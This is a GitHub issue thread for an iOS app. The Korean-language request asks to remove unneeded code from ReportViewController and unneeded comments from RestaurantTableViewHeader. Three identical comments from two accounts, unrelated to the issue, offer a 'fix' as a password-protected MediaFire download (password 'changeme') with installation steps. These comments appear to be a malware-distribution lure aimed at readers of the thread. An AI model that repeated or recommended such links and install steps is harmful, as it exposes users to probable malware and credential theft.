### ISSUE TITLE
[Fix] ReportViewController 코드에서 불필요한 코드 제거, RestaurantTableViewHeader 코드에서 불필요한 주석 제거

### ISSUE THREAD

**Issue by jayn2u** [EAT-SSU/iOS#49]
# 🧰 Fix Request

## 📝 설명

- ReportViewController 코드에서 불필요한 코드 제거
- RestaurantTableViewHeader 코드에서 불필요한 주석 제거

## 🗂️ 첨부자료

- 자료를 첨부해주세요.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
